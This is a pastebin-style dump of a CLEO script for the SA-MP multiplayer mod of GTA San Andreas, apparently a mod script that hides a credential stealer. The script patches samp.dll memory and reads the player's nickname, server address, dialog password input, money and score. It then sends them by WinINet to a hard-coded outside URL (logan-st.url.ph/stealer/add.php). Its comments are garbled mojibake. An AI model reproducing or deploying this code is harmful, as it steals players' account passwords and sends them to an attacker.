CLEO NOSOURCE 0000 wait 1750 0AA2 31 load_library kernel32 dll IF and

  • Anonymous
  • Text only
  • 17 Nov 2014 
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
{$CLEO}

{$NOSOURCE}

0000: 

wait 1750

0AA2: 31@ = load_library "kernel32.dll" // IF and SET 

0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // Aioee?aoa?

0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@  

0@ += 371500 

0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1 

0@ += 4 

0A8C: write_memory 0@ size 1 value 144 virtual_protect 1 

0@ += 9 

0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1 

0@ += 4 

0A8C: write_memory 0@ size 1 value 144 virtual_protect 1 

0AB1: call_scm_func @Thread 1 @Stealer

// Ne?eio

While True

wait 0

end

0a93: //A ooo caeai?eaaaony

:Stealer

0000: 

While true 

wait 0

0AA2: 31@ = load_library "kernel32.dll" // IF and SET 

0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET 

0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@  

0A8E: 3@ = 0@ + 2173568 // int 

0A8D: 2@ = read_memory 3@ size 4 virtual_protect 1 

if 2@ > 1000 

    then 

    0A8E: 22@ = 2@ + 985 // int 

    0A8D: 23@ = read_memory 22@ size 4 virtual_protect 1 

    if 2@ > 1000 

        then

        0A8E: 5@ = 23@ + 20 // int 

        0A8D: 4@ = read_memory 5@ size 4 virtual_protect 1 

        if 4@ > 1000 

            then

            0A8E: 5@ = 4@ + 34 // int 

            0A8D: 24@ = read_memory 5@ size 4 virtual_protect 1 

            if 24@ > 1000 

                then 

                0A8E: 22@ = 0@ + 2173504 // int 

                0A8D: 1@ = read_memory 22@ size 4 virtual_protect 1 

                if 1@ > 1000 

                    then 

                    0A8E: 7@ = 1@ + 40 // int 

                    0A8D: 6@ = read_memory 7@ size 4 virtual_protect 1 

                    0A8E: 5@ = 1@ + 44 // int 

                    0A8D: 26@ = read_memory 5@ size 4 virtual_protect 1 

                    if 6@ == 1 

                        then 

                        if or

                        26@ == 1 

                        26@ == 3 

                            then 

                            25@ = 1

                            end

                        end 

                    if and

                    25@ == 1 

                    not 6@ == 1 

                        then 

                        0A8E: 7@ = 1@ + 48 // int 

                        0A8D: 3@ = read_memory 7@ size 4 virtual_protect 1 

                        0A8E: 6@ = 1@ + 36 // int 

                        0A8D: 13@ = read_memory 6@ size 4 virtual_protect 1 

                        0A8E: 6@ = 0@ + 617008 // int 

                        0AA8: call_function_method 6@ struct 13@ num_params 0 pop 0 5@  

                        0A8E: 6@ = 4@ + 26 // int 

                        0A8D: 23@ = read_memory 6@ size 4 virtual_protect 1 

                        0A8E: 7@ = 4@ + 10 // int 

                        if not 23@ >= 16 

                            then 

                            0085: 12@ = 7@ // (int) 

                            else

                            0A8D: 12@ = read_memory 7@ size 4 virtual_protect 1 

                            end

                        0A8E: 9@ = 2@ + 710 // int 

                        0A8E: 14@ = 2@ + 452 // int 

                        0A8E: 8@ = 2@ + 969 // int 

                        0A8D: 15@ = read_memory 8@ size 4 virtual_protect 1 

                        call @PlayerActive 0 to 33@

                        if 0@ == 1

                        then // spawned

                        wait 2000

                        call @upd_tab 0

                        wait 500 

                        0A8E: 18@ = 4@ + 42 // int 

                        0A8D: 27@ = read_memory 18@ size 4 virtual_protect 1 

                        010B: 21@ = player $PLAYER_CHAR money 

                        0AC6: 0@ = label @Base offset 

                        0AC8: 20@ = allocate_memory_size 1024 //0 - base, 14 - ip, 15 - port, 9 - server, 12 - nick, 3 - dialog, 5 - pass, 21 - money, 27 - score

                        0AD3: 20@ = format "%snick=%s&ip=%s:%d&serv=%s&dialog=%d&input=%s&mn=%d&score=%d" 0@ 12@ 14@ 15@ 9@ 3@ 5@ 21@ 27@

                        0ac8: 8@ = 256

                        0ad3: 8@ = "Stealer" //Anee aaoa aaca oiaao ?aniiciaaaou a?aoca?u, oi iia ?aoeo, ?oi ?a?oaa ?caao a?aoca? "Stealer"

                        0ab1: @InternetOpen 1 {USER_AGENT}8@ to {hSession} 9@ //Ioe?uoea nannee ?a?ac iao "a?aoca?"

                        0ab1: @InternetOpenUrl 2 {hSession} 9@ {Url} 20@ //Ionueea aaiiuo

                        0ac9: 8@

                        0006: 25@ = 0 

                        end

                    end

                end

            end

        end

    end

end

:InternetOpen

0050: @wininet

0AA4: 29@ = get_proc_address "InternetOpenA" library 30@

0AA7: function 29@ params 5 pop 0 {parameters} 0 0 0 {INTERNET_OPEN_TYPE_PRECONFIG} 0 {AGENT} 0@ {HANDLE} 1@

0ab2: 1 1@

:InternetOpenUrl

0050: @wininet

0AA4: 29@ = get_proc_address "InternetOpenUrlA" library 30@

0AA7: function 29@ params 6 pop 0 {parameters} 0 0 0 0 {URL} 1@ {handleInternet} 0@ {HANLDE} 2@

0ab2: 0 

:wininet

0AA2: 30@ = load_library "Wininet.dll"

0051:

:Thread  //Iiaee??aiea 2ai iioiea

0A9F: 32@ = current_thread_pointer 

000A: 32@ += 16 

0A8D: 32@ = read_memory 32@ size 4 virtual_protect 0 

0062: 32@ -= 0@ // (int) 

0AA7: call_function 4607008 num_params 1 pop 1 32@ 33@  

005A: 32@ += 0@ // (int) 

000A: 33@ += 16 

0A8C: write_memory 33@ size 4 value 32@ virtual_protect 0 

000A: 33@ += 44 

for 32@ = 0 to 30

    0A8C: write_memory 33@ size 4 value 1@(32@,30i) virtual_protect 0 

    000A: 33@ += 4 

    end 

0ab2: 0 

:Base //aa?ann aacu

hex

"http:" 2f 2f "logan-st.url.ph" 2f "stealer" 2f "add.php?" 00

end



:upd_tab

// call @upd_tab 0

0AA7: call_function 0x081E406 num_params 1 pop 0 "samp.dll" 0@

0A8E: 1@ = 0@ + 0x4CA0

0@ += 0x212A80

0A8D: 0@ = read_memory 0@ size 4 virtual_protect 1

0AA6: call_method 1@ struct 0@ num_params 0 pop 0

ret 0



:PlayerActive

// call @PlayerActive 0 to 0@

0AA7: call_function 0x081E406 num_params 1 pop 0 "samp.dll" 0@

0@ += 0x212A80

0A8D: 0@ = read_memory 0@ size 4 virtual_protect 0

0@ += 985

0A8D: 0@ = read_memory 0@ size 4 virtual_protect 0

0@ += 20

0A8D: 0@ = read_memory 0@ size 4 virtual_protect 0

0@ += 34

0A8D: 0@ = read_memory 0@ size 4 virtual_protect 0

0A8D: 1@ = read_memory 0@ size 4 virtual_protect 0

ret 1 1@
← newer dump
older dump →